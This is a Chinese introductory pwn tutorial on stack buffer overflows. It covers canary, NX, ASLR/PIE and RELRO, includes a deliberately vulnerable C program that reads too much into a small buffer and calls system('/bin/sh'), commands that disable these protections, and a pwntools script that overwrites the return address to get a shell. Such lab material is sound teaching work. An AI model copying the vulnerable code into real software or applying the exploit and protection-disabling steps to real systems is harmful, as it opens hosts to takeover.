PWN-初识栈溢出

PWN-初识栈溢出

0x01 前置知识

栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时候从栈顶开始弹出数据(最后一个数据被第一个读出来),是一种特殊的线性表。栈的操作常用的有进栈(PUSH),出栈(POP),还有常用的标识栈顶和栈底。

栈溢出:指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。

发生栈溢出的基本前提是:程序必须向栈上写入数据,写入的数据大小没有被良好地控制。

缓冲区溢出,简单的说就是计算机对接收的输入数据没有进行有效的检测(理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符),向缓冲区内填充数据时超过了缓冲区本身的容量,而导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出现缓冲区溢出。所以,栈溢出是缓冲区溢出的一种。

操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就不能直接执行栈上的数据,存在ASLR的话各个系统调用的地址就是随机化的。

常见的保护机制:

  1. CANNARY(栈保护)
    这个选项表示栈保护功能有没有开启。

    栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。

    gcc在4.2版本中添加了-fstack-protector和-fstack-protector-all编译参数以支持栈保护功能,4.9新增了-fstack-protector-strong编译参数让保护的范围更广。

    因此在编译时可以控制是否开启栈保护以及程度,例如:

     gcc -fno-stack-protector -o test test.c  //禁用栈保护
    
     gcc -fstack-protector -o test test.c  //启用堆栈保护,不过只为局部变量中含有char数组的函数插入保护代码
    
     gcc -fstack-protector-all -o test test.c //启用堆栈保护,为所有函数插入保护代码
  2. NX(DEP)

    NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
    工作原理如图:

    dep

    gcc编译器默认开启了NX选项,如果需要关闭NX选项,可以给gcc编译器添加-z execstack参数。

    例如:

    gcc -z execstack -o test test.c

    在Windows下,类似的概念为DEP(数据执行保护),在最新版的Visual Studio中默认开启了DEP编译选项。

  3. PIE(ASLR)

    一般情况下NX(Windows平台上称其为DEP)和地址空间分布随机化(ASLR)会同时工作。

    内存地址随机化机制(address space layout randomization),有以下三种情况

    0 - 表示关闭进程地址空间随机化。

    1 - 表示将mmap的基址,stack和vdso页面随机化。

    2 - 表示在1的基础上增加栈(heap)的随机化。

    可以防范基于Ret2libc方式的针对DEP的攻击。ASLR和DEP配合使用,能有效阻止攻击者在堆栈上运行恶意代码。

    Built as PIE:位置独立的可执行区域(position-independent executables)。这样使得在利用缓冲溢出和移动操作系统中存在的其他内存崩溃缺陷时采用面向返回的编程(return-oriented programming)方法变得难得多。

    liunx下关闭PIE的命令如下:
    sudo -s echo 0 > /proc/sys/kernel/randomize_va_space

    PIE有关的知识详情:https://blog.csdn.net/counsellor/article/details/81543197

  4. RELRO

    设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。

    总之,需要执行:

     sudo -s echo 0 > /proc/sys/kernel/randomize_va_space//可选,如果要关闭系统的ASLR功能就执行这个
    
     gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c

    0x02 环境准备

    ubuntu 16.04(已安装好pwn所需的各种工具)

    0x03 实验

    首先,编写一段简单的C程序(存在栈溢出),这里命名为read.c,代码如下:

    #include<stdio.h>
    void exploit()
    {
     system("/bin/sh");
    }
    void func()
    {
     char str[0x20];
     read(0, str, 0x50);
    }
    int main()
    {
     func();
     return 0;
    }

这里简单介绍下read:

ssize_t read(int fd,void*buf,size_t count)

参数说明:
fd: 是文件描述符, 从command line获取数据时,为0
buf: 为读出数据的缓冲区;
count: 为每次读取的字节数(是请求读取的字节数,读上来的数据保
存在缓冲区buf中,同时文件的当前读写位置向后移)

接着用gcc编译它,编译的时候将各种保护关闭,命令如下:

gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c

编译完成后会生成read文件。

下面用checksec命令检查read文件的保护情况,如下所示:

checksec

可以看到保护机制都已经关闭了。

现在看一下这个程序的text段(程序代码段)有哪些函数,使用以下命令:

objdump -t -j .text read //查看read程序的.text段有哪些函数

objdump命令:

-j name

–section=name 仅仅显示指定名称为name的section的信息

-t

–syms 显示文件的符号表入口。类似于nm -s提供的信息

objdump

上图中可以看到有main函数、exploit函数以及func函数等。

然后使用gdb进行调试,命令:
gdb read

这里我的gdb默认设置的是pwndbg插件(也可以设置成peda,前提是已经安装了),启动gdb之后,使用命令disass func来查看func函数的反汇编,如下所示:

disass_func

通过上图可以看到栈中开辟了0x28的空间,所以至少要覆盖掉0x28,然后加0x4就会覆盖到ebp,如果加0x8就会覆盖到ret,简单用图表示如下:

offset

接着再来使用disass命令确认下exploit函数的地址(之前objdump中是0x08048456):

exploit

可以看到确实是0x08048456。

下面便开始编写exp(使用python编写)代码如下:

from pwn import*         # 导入包

p = process("./read")    # 创建进程
offset = 0x28 + 0x4      # 计算偏移
payload = 'a'*offset + p32(0x08048456)  # 覆盖ret,p32打包一个整数为32位
p.sendline(payload)      # 发送payload,并进行换行(末尾\n)
p.interactive()          # 进行交互

这里简单列一下pwntools部分相关用法:

send(data): 发送数据

sendline(data) : 发送一行数据,相当于在末尾加n

recv(numb=4096, timeout=default) : 给出接收字节数,timeout指定超时

recvuntil(delims, drop=False) : 接收到delims的pattern

(以下可以看作until的特例)

recvline(keepends=True) : 接收到n,keepends指定保留n

recvall() : 接收到EOF

recvrepeat(timeout=default) : 接收到EOF或timeout

interactive() : 与shell交互

更详细请参考:

https://pwntools.readthedocs.io/en/stable/index.html

https://xz.aliyun.com/t/3944

最后运行一下exp,可以看到执行成功,getshell:

getshell